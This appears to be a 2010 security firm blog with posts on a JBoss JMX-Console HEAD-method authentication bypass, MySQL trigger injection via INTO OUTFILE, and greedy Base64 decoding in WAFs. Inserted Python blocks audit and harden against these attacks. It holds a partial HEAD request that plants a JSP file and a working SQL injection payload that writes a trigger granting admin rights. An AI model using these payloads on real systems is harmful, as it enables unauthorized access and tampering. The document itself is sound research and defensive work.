Friday, April 30, 2010

Authentication bypass vulnerabilities are always interesting from a penetration tester's point of view, because 80% of the time they are very simple to abuse. The impact of such a bypass depends, from a technical perspective, on what you are able to do once you are authenticated.

JBoss ships some good management tools that are used to deploy new applications and to perform privileged actions such as executing scripts on the remote host. One of these is the JBoss JMX-Console.

For more information on what an attacker may accomplish through the JMX-Console, I suggest reading the following presentation:

From the configuration above, security restrictions are enabled only for the GET and POST methods. Any other HTTP method supported by the server will not be restricted.

By issuing a request with the HEAD method it is possible to invoke directly, with JBossAdmin privileges and without valid credentials, any functionality implemented by the jmx-console: the container routes HEAD to the same handler as GET (HttpServlet's default doHead() calls doGet() and discards the response body), so the operation runs while the constraint that names only GET and POST is never applied. Note: if the JMX console replies with an HTTP 500 error, the request has been correctly processed.

This kind of attack is referred to in AppSec literature as Verb Tampering. The following paper is a very good one on this topic.

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1
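As an added example (not from the original post or the JBoss project), a small Python audit of a web.xml security constraint that enumerates HTTP methods, run against a constructed descriptor modelled on the jmx-console one described above; the function names and the sample descriptor are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed web.xml modelled on the jmx-console descriptor the post
# describes: the constraint names only GET and POST, so every other verb
# (HEAD, PUT, ...) reaches the HtmlAdaptor without authentication.
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>JBossAdmin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

def _local(tag):
    """Tag name without an XML namespace, so namespaced descriptors work too."""
    return tag.rsplit("}", 1)[-1]

def audit_constraints(web_xml):
    """One finding per <web-resource-collection> that lists <http-method>s.
    The servlet spec applies a constraint only to the listed verbs, so any
    unlisted verb is unprotected; a collection with no <http-method> is fine."""
    findings = []
    for coll in ET.fromstring(web_xml).iter():
        if _local(coll.tag) != "web-resource-collection":
            continue
        methods = [c.text.strip().upper() for c in coll
                   if _local(c.tag) == "http-method" and c.text]
        if methods:
            name = next((c.text for c in coll if _local(c.tag) == "web-resource-name"), "?")
            patterns = [c.text for c in coll if _local(c.tag) == "url-pattern"]
            findings.append({"resource": name, "patterns": patterns, "listed": methods})
    return findings

def harden(web_xml):
    """Copy with every <http-method> removed: the constraint then covers all verbs."""
    root = ET.fromstring(web_xml)
    for coll in root.iter():
        if _local(coll.tag) == "web-resource-collection":
            for m in [c for c in coll if _local(c.tag) == "http-method"]:
                coll.remove(m)
    return ET.tostring(root, encoding="unicode")
```

Dropping the <http-method> elements (or, on Servlet 3.0 containers, switching to <http-method-omission>) is what makes the auth-constraint apply to HEAD and every other verb.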

Wednesday, April 21, 2010

Security experts know that it is possible to inject stacked queries on Microsoft SQL Server when dealing with SQL injection, but not on other DBMSs.

In the next few lines we'll describe a new technique that could allow an attacker to insert or update data even when the SQL injection is in a SELECT query. The best-known attack, also implemented in sqlmap, is the takeover technique used when the MySQL user has the FILE privilege and the DBMS runs on the same server as the exposed web application. What can be done when the DBMS host is a different server?

Something can be done by abusing triggers. MySQL supports triggers since 5.0.2. In MySQL, triggers are written as separate files in the database's directory under the data dir. Two files are needed:

/mysql/datadir/DB/TableName.TRG

/mysql/datadir/DB/TriggerName.TRN

Suppose now that a `user` table exists in the users DB. Run the mysql client and create the following trigger:

We can see that two files were created in the data directory of the users DB: /var/lib/mysql/users/atk.TRN

TYPE=TRIGGERNAME
trigger_table=user

and /var/lib/mysql/users/user.TRG

TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nupdate user set isadmin=1 where isadmin=0;\nend'
sql_modes=0
definers='root@localhost'
client_cs_names='latin1'
connection_cl_names='latin1_swedish_ci'
db_cl_names='latin1_swedish_ci'

What happens if we successfully write user.TRG and atk.TRN into /var/lib/mysql/users/ using INTO OUTFILE?

AND 1=0 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 where isadmin=1;\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

Then do the same to create atk.TRN:

TYPE=TRIGGERNAME
trigger_table=user

MySQL will check whether a .TRG file is present and will execute the trigger. So, in this scenario, after a user registration every user will be an admin... and stored XSS such as frame injection could be accomplished as well. Some privilege escalation could probably be done too, since the DEFINER clause tells MySQL on behalf of which user the trigger should be executed.
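As an added defensive example, not from the original post: a Python parser for the .TRG layout shown above that extracts the trigger name, table, DEFINER and body, so a file found in a database directory can be compared with what SHOW TRIGGERS reports; one trigger per file and the escape rules are assumptions taken from the sample, and the function names are mine.

```python
import re

# Constructed sample laid out like the user.TRG file shown above: one
# key=value per line, string values single-quoted with \n \' \\ escapes.
SAMPLE_TRG = r"""TYPE=TRIGGERS
triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nupdate user set isadmin=1 where isadmin=0;\nend'
sql_modes=0
definers='root@localhost'
client_cs_names='latin1'
connection_cl_names='latin1_swedish_ci'
db_cl_names='latin1_swedish_ci'
"""

_ESC = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "'": "'"}
_HEAD = re.compile(r"\btrigger\s+`?(\w+)`?\s+(before|after)\s+"
                   r"(insert|update|delete)\s+on\s+`?(\w+)`?", re.I)

def _unescape(s):  # undo the backslash escapes used inside quoted values
    return re.sub(r"\\(.)", lambda m: _ESC.get(m[1], m[1]), s, flags=re.S)

def parse_trg(text):
    """Key=value fields of a TYPE=TRIGGERS file (one trigger per file assumed)."""
    fields = {}
    for line in text.splitlines():
        key, sep, raw = line.partition("=")
        if sep:
            raw = raw.strip()
            if len(raw) >= 2 and raw[0] == raw[-1] == "'":
                raw = _unescape(raw[1:-1])
            fields[key.strip()] = raw
    return fields

def trigger_summary(text):
    """Name, timing, event, table, definer and body pulled out of the file."""
    f = parse_trg(text)
    m = _HEAD.search(f.get("triggers", ""))
    if f.get("TYPE") != "TRIGGERS" or not m:
        raise ValueError("not a trigger definition file")
    return {"name": m[1], "timing": m[2].lower(), "event": m[3].lower(),
            "table": m[4], "definer": f.get("definers", ""), "body": f["triggers"]}

def review(summary, known_names, privileged=("root",)):
    """Reasons for a DBA to look at this file: unknown trigger or privileged DEFINER."""
    reasons = []
    if summary["name"] not in known_names:
        reasons.append(f"unknown trigger {summary['name']} on table {summary['table']}")
    if summary["definer"].split("@", 1)[0] in privileged:
        reasons.append(f"definer {summary['definer']} is a privileged account")
    return reasons
```

The write itself requires the FILE privilege on the injected connection, so the application account should not hold it and secure_file_priv should point away from the data directory.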

Another interesting thing about this attack is that we can try fuzzing

tabname.MYD

tabname.MYI

tabname.frm

and of course

tabname.TRG

triggername.TRN

file formats and try to exploit the file format parsers. We found some crashes in the TRG parser which don't seem to be exploitable, but who knows... further research could result in exploitable parser errors in those file formats.

When dealing with web application firewalls, IDSs or application filters that try to block attacks, there are always two big problems:

Completeness

Correctness

We know regexps can be faulty, but let's suppose there is some sort of encoding in the payload which is further decoded at some server-side layer and then passed in clear text to another layer. A good defense would be to let the WAF/filter decode it and check for attack patterns (using regexps...). Now the question is: how can I implement a decoder to get the input back in clear text? Let's talk about Base64.

Base64 encoding and decoding are implemented in many ways and in many languages. For example, PHP's base64_decode() is:

Very greedy.

Goes ahead even if something goes wrong.

Even some Java implementations are kind of greedy: com.sun.org.apache.xerces.internal.impl.dv.util.Base64
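As an added example (not from the original post), a Python WAF-side normalizer: a strict RFC 4648 decoder beside a greedy one approximating the PHP behaviour described above, so that signatures are matched against every view a greedy back end would see; the signatures, samples and function names are constructed assumptions.

```python
import base64, binascii, re, string

_ALPHABET = set(string.ascii_letters + string.digits + "+/")
# Constructed detection signatures; a real filter carries many more.
SIGNATURES = {"sqli_union": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
              "xss_script": re.compile(r"<\s*script", re.I)}
# Constructed samples: a clean Base64 value and the same value with junk
# separators, which a strict decoder rejects and a greedy one happily reads.
SAMPLE_CLEAN = base64.b64encode(b"id=1' UNION SELECT 1,2").decode()
SAMPLE_NOISY = "-".join(SAMPLE_CLEAN[i:i + 4] for i in range(0, len(SAMPLE_CLEAN), 4))

def strict_decode(s):
    """RFC 4648 decoding: a character outside the alphabet or bad padding fails."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None

def lenient_decode(s):
    """Approximates the greedy behaviour the post attributes to PHP's
    base64_decode(): ignore every foreign character, repair the padding,
    drop a lone trailing sextet, and decode whatever is left."""
    cleaned = "".join(c for c in s if c in _ALPHABET)
    if len(cleaned) % 4 == 1:
        cleaned = cleaned[:-1]
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned)
    except (binascii.Error, ValueError):
        return None

def decoded_views(value, max_depth=3):
    """The raw value plus each Base64 layer peeled with the greedy rule; a
    strict-only filter would stop at the first junk byte the back end ignores."""
    views, cur = [value], value
    for _ in range(max_depth):
        raw = lenient_decode(cur)
        if not raw:
            break
        try:
            cur = raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        views.append(cur)
    return views

def matches(value):
    """Signature names that fire on any decoded view of the value."""
    return sorted({name for v in decoded_views(value)
                   for name, rx in SIGNATURES.items() if rx.search(v)})
```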

About Minded Security

Minded Security is the Software Security Company that supports you to build, deliver and use more secure software. Minded Security helps businesses and organizations to build secure products and services.